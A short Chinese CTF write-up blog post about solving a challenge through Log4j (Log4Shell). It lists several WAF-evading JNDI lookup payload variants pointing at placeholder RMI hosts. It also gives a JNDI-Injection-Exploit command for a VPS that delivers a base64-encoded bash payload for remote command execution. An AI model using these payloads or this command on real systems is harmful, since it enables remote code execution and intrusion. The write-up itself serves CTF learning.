本文已参与「新人创作礼」活动,一起开启掘金创作之路。
1NDEX
0x00
之前没复现log4j
然后看题目是shiro 测了一下发现有的
但是好像卵用没用…
弹不出来 很多命令执行了也没反应
然后纯坐牢
0x01 复现
后面看了才知道是log4j
后悔一开始没好好复现
关于log4j的一些基础
之前写过一篇
是有waf的
payload变种
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1099/ass}
${${::-j}ndi:rmi://127.0.0.1:1099/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
第一个就能用
VPS上起个evil-ldap
工具地址
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,xxxx(base64编码payload)}|{base64,-d}|{bash,-i}" -A "xxxx(VPS地址)"
关于为什么要base64编码payload
避免空格以及重定位符号的影响
详见
发包
done
参考文章
0x02 rethink
休整完了 重开了